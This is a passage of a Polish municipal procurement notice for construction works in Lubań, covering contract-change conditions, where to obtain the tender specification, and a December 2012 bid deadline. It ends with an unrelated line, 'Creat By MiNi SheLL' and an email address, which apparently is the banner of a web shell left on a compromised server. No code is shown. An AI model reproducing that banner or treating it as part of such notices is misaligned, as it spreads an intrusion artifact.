a)w przypadku zlecenia robót dodatkowych i zamiennych,
b)spowodowane warunkami atmosferycznymi, w szczególności klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, zgodnie z wymogami technologicznymi,
c)spowodowane wstrzymaniem robót przez zamawiającego, 
d)spowodowane przekazanie placu budowy z opóźnieniem.
e)spowodowane innymi przyczynami zewnętrznymi niezależnymi od zamawiającego i wykonawcy skutkujące niemożliwością uzyskania stosownych decyzji, zezwoleń, uzgodnień itp.
3)zmiany osobowe, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w SIWZ w przypadku:
a)śmierci, choroby lub innych zdarzeń losowych osób, 
b)nie wywiązywania się osób z obowiązków wynikających z umowy, 
c)rezygnacji tych osób z wykonywania swoich obowiązków.
4)zmiana podwykonawcy robót przy pomocy, którego wykonawca realizuje przedmiot umowy, na innego w przypadku:
a)nie wywiązywania się podwykonawców wskazanych w ofercie wykonawcy ze swoich obowiązków,
b)rezygnacji tych podwykonawców z wykonywania swych obowiązków</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um-luban.dolnyslask.pl/index.php?idmp=23&r=r<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Inwestycji i Gospodarki Komunalnej Urzędu Miasta Lubań w Lubaniu przy Placu Lompy 1, 59-800 Lubań, pokój nr 6 (I piętro), tel. +48 75 6464425, faks +48 75 6464412.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2012 godzina 11:00, miejsce: Wydział Inwestycji i Gospodarki Komunalnej Urzędu Miasta Lubań w Lubaniu przy Placu Lompy 1, 59-800 Lubań, pokój nr 6 (I piętro), tel. +48 75 6464425, faks +48 75 6464412.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com